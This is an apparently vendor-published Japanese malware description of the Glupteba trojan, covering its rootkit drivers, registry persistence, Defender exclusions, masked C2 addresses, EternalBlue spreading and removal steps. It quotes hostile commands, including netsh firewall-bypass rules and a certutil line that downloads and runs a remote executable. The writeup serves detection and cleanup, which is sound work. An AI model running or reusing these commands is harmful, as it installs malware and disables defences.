TROJ_GLUPTEBA.JMZ
Windows
- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化: はい
- 感染報告の有無: はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
マルウェアは、特定のWebサイトにアクセスし、情報を送受信します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のコンポーネントファイルを作成します。
- %System%\drivers\winmon.sys - rootkit, hides processes.
- %System%\drivers\WinmonFS.sys - rootkit, hides files and folders.
- %System%\drivers\WinmonProcessMonitor.sys - rootkit, finds specific processes and closes them.
(註:%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.)
マルウェアは、感染したコンピュータ内に以下のように自身のコピーを作成します。
- %Windows%\rss\csrss.exe
(註:%Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)
マルウェアは、以下のフォルダを作成します。
- %User Temp%\csrss
- %Windows%\rss
(註:%User Temp%フォルダは、ユーザの一時フォルダで、Windows 2000、XP および Server 2003 の場合、通常、"C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"、Windows Vista 、 7 、8、8.1 、Server 2008 および Server 2012の場合、"C:\Users\<ユーザ名>\AppData\Local\Temp" です。.. %Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)
マルウェアは、以下の Mutex を作成し、メモリ上で自身の重複実行を避けます。
- Global\h48yorbq6rm87zot
マルウェアは、自身(コンピュータに侵入して最初に自身のコピーを作成したマルウェア)を終了し、侵入したコンピュータ内で作成した自身のコピーの方を実行します。
自動実行方法
マルウェアは、自身のコピーがWindows起動時に自動実行されるよう以下のレジストリ値を追加します。
HKEY_CURRENT_USER\Software\Microsoft\
CurrentVersion\Run
{random name} = %Windows%\rss\csrss.exe
他のシステム変更
マルウェアは、以下のレジストリキーを追加します。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\TCPSvc
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Security
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
マルウェアは、以下のレジストリ値を追加します。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
DisplayName = Winmon
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
ErrorControl = 0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
ImagePath = \??\%System%\drivers\Winmon.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
Start = 3
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon
Type = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\Winmon\Security
Security = {hex values}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
DependOnService = FltMgr
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
DisplayName = WinmonFS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
ErrorControl = 0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Group = FSFilter Activity Monitor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
ImagePath = \??\%System%\drivers\WinmonFS.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Start = 3
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS
Type = 2
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances
DefaultInstance = WinmonFS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS
Altitude = 370000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Instances\
WinmonFS
Flags = 0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonFS\Security
Security = {hex values}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
DisplayName = WinmonProcessMonitor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
ErrorControl = 0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
ImagePath = \??\{hex values}\drivers\WinmonProcessMonitor.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
Start = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\WinmonProcessMonitor
Type = 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows% = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows%\rss = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Application Data%\EpicNet Inc\CloudNet = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%User Temp%\csrss = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Application Data%\PatientVoice = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%Windows%\windefender.exe = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%User Temp%\wup = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Paths
%System%\drivers = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
csrss.exe = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
cloudnet.exe = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
windefender.exe = 0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows Defender\Exclusions\Processes
{malware filename} = 0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\TCPSvc
Type = 16
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\TCPSvc
Start = 2
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\TCPSvc
ErrorControl = 0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\TCPSvc
ImagePath = "%User Temp%\csrss\proxy\tor.exe" --nt-service -f "%User Temp%\csrss\proxy\config" --Log "notice file %User Temp%\csrss\proxy\t"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\TCPSvc
DisplayName = TCPSvc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
services\TCPSvc
ObjectName = LocalSystem
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Name = {random}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Defender = {string}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Servers = https://{BLOCKED}rgnew.com , https://{BLOCKED}dcoolest.com , https://{BLOCKED}4500.com
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
UUID = {value}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Command = {value}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
FirstInstallDate = {value}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
CloudnetSource = {string}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
ServiceVersion = {string}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
SC = {value}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
PGDSE = {value]
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
VC = {value}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
OSCaption = {Operating System of affected machine}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
OSArchitecture = {32 or 64}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
IsAdmin = {value}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
AV = {strings}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
PatchTime = {value}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
CPU = {CPU details of affected machine}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
GPU = {GPU details of affected machine}
HKEY_CURRENT_USER\Software\Microsoft\
TestApp
Firewall = {string}
ダウンロード活動
マルウェアは、以下のWebサイトにアクセスして自身のコンポーネントファイルをダウンロードします。
- https://dp.{BLOCKED}dcoolest.com/deps/3/deps.zip - EternalBlue/DoublePulsar components
- https://dp.{BLOCKED}dcoolest.com/proxy/latest.zip - Tor Proxy components
- http://dp.{BLOCKED}dcoolest.com/scheduled.exe - updated copy of itself
- http://dp.{BLOCKED}dcoolest.com/app/3/app.exe - updated copy of itself
- http://dp.{BLOCKED}dcoolest.com/vc.exe - download browser credential stealer
- https://{BLOCKED}andflys.com/n/watchdog.exe - downloader for another TROJ_GLUPTEBA malware
マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。
- EternalBlue\DoublePulsar files are extracted and saved as:
- %User Temp%\csrss\smb\adfw-2.dll
- %User Temp%\csrss\smb\adfw.dll
- %User Temp%\csrss\smb\cnli-0.dll
- %User Temp%\csrss\smb\cnli-1.dll
- %User Temp%\csrss\smb\coli-0.dll
- %User Temp%\csrss\smb\crli-0.dll
- %User Temp%\csrss\smb\dmgd-1.dll
- %User Temp%\csrss\smb\dmgd-4.dll
- %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
- %User Temp%\csrss\smb\esco-0.dll
- %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
- %User Temp%\csrss\smb\exma-1.dll
- %User Temp%\csrss\smb\exma.dll
- %User Temp%\csrss\smb\iconv.dll
- %User Temp%\csrss\smb\libcurl.dll
- %User Temp%\csrss\smb\libeay32.dll
- %User Temp%\csrss\smb\libiconv-2.dll
- %User Temp%\csrss\smb\libxml2.dll
- %User Temp%\csrss\smb\payload32.dll
- %User Temp%\csrss\smb\payload64.dll
- %User Temp%\csrss\smb\pcla-0.dll
- %User Temp%\csrss\smb\pcre-0.dll
- %User Temp%\csrss\smb\pcrecpp-0.dll
- %User Temp%\csrss\smb\pcreposix-0.dll
- %User Temp%\csrss\smb\posh-0.dll
- %User Temp%\csrss\smb\posh.dll
- %User Temp%\csrss\smb\pytrch.py
- %User Temp%\csrss\smb\pytrch.pyc
- %User Temp%\csrss\smb\riar-2.dll
- %User Temp%\csrss\smb\riar.dll
- %User Temp%\csrss\smb\ssleay32.dll
- %User Temp%\csrss\smb\tibe-1.dll
- %User Temp%\csrss\smb\tibe-2.dll
- %User Temp%\csrss\smb\tibe.dll
- %User Temp%\csrss\smb\trch-0.dll
- %User Temp%\csrss\smb\trch-1.dll
- %User Temp%\csrss\smb\trch.dll
- %User Temp%\csrss\smb\trfo-0.dll
- %User Temp%\csrss\smb\trfo-2.dll
- %User Temp%\csrss\smb\trfo.dll
- %User Temp%\csrss\smb\tucl-1.dll
- %User Temp%\csrss\smb\tucl.dll
- %User Temp%\csrss\smb\ucl.dll
- %User Temp%\csrss\smb\xdvl-0.dll
- %User Temp%\csrss\smb\zibe.dll
- %User Temp%\csrss\smb\zlib1.dll
- %User Temp%\csrss\smb\_pytrch.pyd
- Tor and Obfs4proxy files are extracted and saved as:
- %User Temp%\csrss\proxy\config
- %User Temp%\csrss\proxy\libeay32.dll
- %User Temp%\csrss\proxy\libevent-2-0-5.dll
- %User Temp%\csrss\proxy\libevent_core-2-0-5.dll
- %User Temp%\csrss\proxy\libevent_extra-2-0-5.dll
- %User Temp%\csrss\proxy\libgcc_s_sjlj-1.dll
- %User Temp%\csrss\proxy\libssp-0.dll
- %User Temp%\csrss\proxy\obfs4proxy.exe
- %User Temp%\csrss\proxy\ssleay32.dll
- %User Temp%\csrss\proxy\tor-gencert.exe
- %User Temp%\csrss\proxy\tor.exe
- %User Temp%\csrss\proxy\zlib1.dll
- %User Temp%\csrss\cloudnet.exe
- %User temp%\csrss\vc.exe
- %Windows%\windefender.exe
(註:%User Temp%フォルダは、ユーザの一時フォルダで、Windows 2000、XP および Server 2003 の場合、通常、"C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"、Windows Vista 、 7 、8、8.1 、Server 2008 および Server 2012の場合、"C:\Users\<ユーザ名>\AppData\Local\Temp" です。.. %Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。.)
その他
マルウェアは、以下のWebサイトにアクセスし、情報を送受信します。
- https://{DOMAIN}/bots/register
- https://{DOMAIN}/bots/poll
- https://{DOMAIN}/bots/update-data
- https://{DOMAIN}/bots/report-install
- https://{DOMAIN}/bots/log
- https://{DOMAIN}/bots/report
- https://{BLOCKED}rgnew.com/bots/install-failure
- http://{BLOCKED}gilka.com/install-failure
- {BLOCKED}67kbbbc4v.onion/31337
<補足>
インストール
マルウェアは、以下のコンポーネントファイルを作成します。
- %System%\drivers\winmon.sys - プロセスを隠すルートキット
- %System%\drivers\WinmonFS.sys - ファイルおよびフォルダを隠すルートキット
- %System%\drivers\WinmonProcessMonitor.sys - 特定のプロセスを見つけ出し終了させるルートキット
(註:%System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常 "C:\Windows\System32" です。)
ダウンロード活動
マルウェアは、以下のWebサイトにアクセスして自身のコンポーネントファイルをダウンロードします。
- https://dp.{BLOCKED}dcoolest.com/deps/3/deps.zip - EternalBlue/DoublePulsarのコンポーネントをダウンロードする
- https://dp.{BLOCKED}dcoolest.com/proxy/latest.zip - Torプロキシのコンポーネントをダウンロードする
- http://dp.{BLOCKED}dcoolest.com/scheduled.exe - 更新された自身のコピーをダウンロードする
- http://dp.{BLOCKED}dcoolest.com/app/3/app.exe - 更新された自身のコピーをダウンロードする
- http://dp.{BLOCKED}dcoolest.com/vc.exe - ブラウザの認証情報を窃取するマルウェアをダウンロードする
- https://{BLOCKED}andflys.com/n/watchdog.exe - 別の TROJ_GLUPTEBA のダウンローダをダウンロードする
マルウェアは、以下のファイル名でダウンロードしたファイルを保存します。
- EternalBlue \ DoublePulsarのファイルは展開され以下として保存されます。
- %User Temp%\csrss\smb\adfw-2.dll
- %User Temp%\csrss\smb\adfw.dll
- %User Temp%\csrss\smb\cnli-0.dll
- %User Temp%\csrss\smb\cnli-1.dll
- %User Temp%\csrss\smb\coli-0.dll
- %User Temp%\csrss\smb\crli-0.dll
- %User Temp%\csrss\smb\dmgd-1.dll
- %User Temp%\csrss\smb\dmgd-4.dll
- %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
- %User Temp%\csrss\smb\esco-0.dll
- %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
- %User Temp%\csrss\smb\exma-1.dll
- %User Temp%\csrss\smb\exma.dll
- %User Temp%\csrss\smb\iconv.dll
- %User Temp%\csrss\smb\libcurl.dll
- %User Temp%\csrss\smb\libeay32.dll
- %User Temp%\csrss\smb\libiconv-2.dll
- %User Temp%\csrss\smb\libxml2.dll
- %User Temp%\csrss\smb\payload32.dll
- %User Temp%\csrss\smb\payload64.dll
- %User Temp%\csrss\smb\pcla-0.dll
- %User Temp%\csrss\smb\pcre-0.dll
- %User Temp%\csrss\smb\pcrecpp-0.dll
- %User Temp%\csrss\smb\pcreposix-0.dll
- %User Temp%\csrss\smb\posh-0.dll
- %User Temp%\csrss\smb\posh.dll
- %User Temp%\csrss\smb\pytrch.py
- %User Temp%\csrss\smb\pytrch.pyc
- %User Temp%\csrss\smb\riar-2.dll
- %User Temp%\csrss\smb\riar.dll
- %User Temp%\csrss\smb\ssleay32.dll
- %User Temp%\csrss\smb\tibe-1.dll
- %User Temp%\csrss\smb\tibe-2.dll
- %User Temp%\csrss\smb\tibe.dll
- %User Temp%\csrss\smb\trch-0.dll
- %User Temp%\csrss\smb\trch-1.dll
- %User Temp%\csrss\smb\trch.dll
- %User Temp%\csrss\smb\trfo-0.dll
- %User Temp%\csrss\smb\trfo-2.dll
- %User Temp%\csrss\smb\trfo.dll
- %User Temp%\csrss\smb\tucl-1.dll
- %User Temp%\csrss\smb\tucl.dll
- %User Temp%\csrss\smb\ucl.dll
- %User Temp%\csrss\smb\xdvl-0.dll
- %User Temp%\csrss\smb\zibe.dll
- %User Temp%\csrss\smb\zlib1.dll
- %User Temp%\csrss\smb\_pytrch.pyd
- Tor および Obfs4proxy のファイルは展開され以下として保存されます。
- %User Temp%\csrss\proxy\config
- %User Temp%\csrss\proxy\libeay32.dll
- %User Temp%\csrss\proxy\libevent-2-0-5.dll
- %User Temp%\csrss\proxy\libevent_core-2-0-5.dll
- %User Temp%\csrss\proxy\libevent_extra-2-0-5.dll
- %User Temp%\csrss\proxy\libgcc_s_sjlj-1.dll
- %User Temp%\csrss\proxy\libssp-0.dll
- %User Temp%\csrss\proxy\obfs4proxy.exe
- %User Temp%\csrss\proxy\ssleay32.dll
- %User Temp%\csrss\proxy\tor-gencert.exe
- %User Temp%\csrss\proxy\tor.exe
- %User Temp%\csrss\proxy\zlib1.dll
- %User Temp%\csrss\cloudnet.exe
- %User temp%\csrss\vc.exe
- %Windows%\windefender.exe
(註:%User Temp%フォルダは、ユーザの一時フォルダで、Windows 2000、XP および Server 2003 の場合、通常、"C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"、Windows Vista 、 7 、8、8.1 、Server 2008 および Server 2012の場合、"C:\Users\<ユーザ名>\AppData\Local\Temp" です。.. %Windows%フォルダは、Windowsが利用するフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows" です。)
その他
マルウェアは以下を実行します。
- tor.exe および obfs4proxy.exe のファイルがプロキシとして機能する可能性があります。
- マルウェアは、EternalBlue / DoublePulsarのコンポーネントを使用して以下のソフトウェアの脆弱性を利用し、コインマイナーのコンポーネントをネットワーク上に拡散します。
- Vmware または VirtualBox環境下で実行されていることを確認した場合、自身を終了します。
- Windowsファイアウォールを迂回するために、以下のコマンドを実行します。
- netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="%Windows%\rss\csrss.exe" enable=yes
- netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="%Application Data%\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes
- 以下のWebサイトに接続し、コインマイナーとその設定ファイルをダウンロードします。
- https://{DOMAIN}.com/bots/check?uuid={UUID}
- https://{DOMAIN}.com/bots/checkv?uuid={UUID}
- ダウンロードされたコインマイナーのコンポーネントは、以下として保存されます。
- %User temp%\wup\wup.exe
- %User temp%\wup\wupv.exe
- ダウンロードされたコインマイナーのコンポーネントは、以下として保存されます。
- 以下のレジストリエントリを変更して、Windows Updateサービスを無効にします。
- HKEY_LOCAL_MACHINE\CurrentControlSet\services\wuauserv
value = Start
data = 4
- HKEY_LOCAL_MACHINE\CurrentControlSet\services\wuauserv
以下のスケジュールされたタスクを追加します。
- タスク名:csrss
スケジュール:任意のユーザのログオン時
実行するタスク:%Windows%\rss\csrss.exe - タスク名:ScheduledUpdate
スケジュール:任意のユーザーのログオン時
実行するタスク: cmd.exe /C certutil.exe -urlcache -split -f http://{BLOCKED}mmer.com/app/app.exe %User Temp%\csrss\scheduled.exe && %User Temp%\csrss\scheduled.exe /31340
注意:
{DOMAIN}の値には以下のいずれかが当てはまります。
- {BLOCKED} rgnew.com
- {BLOCKED} dcoolest.com
- {BLOCKED} 4500.com
対応方法
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム(OS)の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル/フォルダ/レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。
手順 3
Windowsをセーフモードで再起動します。
手順 4
このレジストリキーを削除します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
- TCPSvc
- TCPSvc
- In HKEY_CURRENT_USER\Software\Microsoft
- TestApp
- TestApp
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
- Winmon
- Winmon
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
- Security
- Security
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
- WinmonFS
- WinmonFS
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
- Instances
- Instances
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances
- WinmonFS
- WinmonFS
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\servicesWinmonFS
- Security
- Security
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
- WinmonProcessMonitor
- WinmonProcessMonitor
手順 5
このレジストリ値を削除します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
- DisplayName = Winmon
- DisplayName = Winmon
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
- ErrorControl = 0
- ErrorControl = 0
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
- ImagePath = \??\%System%\drivers\Winmon.sys
- ImagePath = \??\%System%\drivers\Winmon.sys
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
- Start = 3
- Start = 3
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon
- Type = 1
- Type = 1
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Winmon\Security
- Security = {hex values}
- Security = {hex values}
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
- DependOnService = FltMgr
- DependOnService = FltMgr
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
- DisplayName = WinmonFS
- DisplayName = WinmonFS
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
- ErrorControl = 0
- ErrorControl = 0
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
- Group = FSFilter Activity Monitor
- Group = FSFilter Activity Monitor
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
- ImagePath = \??\%System%\drivers\WinmonFS.sys
- ImagePath = \??\%System%\drivers\WinmonFS.sys
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
- Start = 3
- Start = 3
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS
- Type = 2
- Type = 2
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances
- DefaultInstance = WinmonFS
- DefaultInstance = WinmonFS
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances\WinmonFS
- Altitude = 370000
- Altitude = 370000
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Instances\WinmonFS
- Flags = 0
- Flags = 0
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonFS\Security
- Security = {hex values}
- Security = {hex values}
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
- DisplayName = WinmonProcessMonitor
- DisplayName = WinmonProcessMonitor
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
- ErrorControl = 0
- ErrorControl = 0
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
- ImagePath = \??\{hex values}\drivers\WinmonProcessMonitor.sys
- ImagePath = \??\{hex values}\drivers\WinmonProcessMonitor.sys
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
- Start = 1
- Start = 1
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WinmonProcessMonitor
- Type = 1
- Type = 1
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- %Windows% = 0
- %Windows% = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- %Windows%\rss = 0
- %Windows%\rss = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- %Application Data%\EpicNet Inc\CloudNet = 0
- %Application Data%\EpicNet Inc\CloudNet = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- %User Temp%\csrss = 0
- %User Temp%\csrss = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- %Application Data%\PatientVoice = 0
- %Application Data%\PatientVoice = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- %Windows%\windefender.exe = 0
- %Windows%\windefender.exe = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- %User Temp%\wup = 0
- %User Temp%\wup = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
- %System%\drivers = 0
- %System%\drivers = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
- csrss.exe = 0
- csrss.exe = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
- cloudnet.exe = 0
- cloudnet.exe = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
- windefender.exe = 0
- windefender.exe = 0
- In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes
- {malware filename} = 0
- {malware filename} = 0
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPSvc
- Type = 16
- Type = 16
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPSvc
- Start = 2
- Start = 2
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPSvc
- ErrorControl = 0
- ErrorControl = 0
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPSvc
- ImagePath = "%User Temp%\csrss\proxy\tor.exe" --nt-service -f "%User Temp%\csrss\proxy\config" --Log "notice file %User Temp%\csrss\proxy\t"
- ImagePath = "%User Temp%\csrss\proxy\tor.exe" --nt-service -f "%User Temp%\csrss\proxy\config" --Log "notice file %User Temp%\csrss\proxy\t"
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPSvc
- DisplayName = TCPSvc
- DisplayName = TCPSvc
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPSvc
- ObjectName = LocalSystem
- ObjectName = LocalSystem
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- Name = {random}
- Name = {random}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- Defender = {string}
- Defender = {string}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- Servers = https://{BLOCKED}rgnew.com , https://{BLOCKED}dcoolest.com , https://{BLOCKED}4500.com
- Servers = https://{BLOCKED}rgnew.com , https://{BLOCKED}dcoolest.com , https://{BLOCKED}4500.com
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- UUID = {value}
- UUID = {value}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- Command = {value}
- Command = {value}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- FirstInstallDate = {value}
- FirstInstallDate = {value}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- CloudnetSource = {string}
- CloudnetSource = {string}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- ServiceVersion = {string}
- ServiceVersion = {string}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- SC = {value}
- SC = {value}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- PGDSE = {value}
- PGDSE = {value}
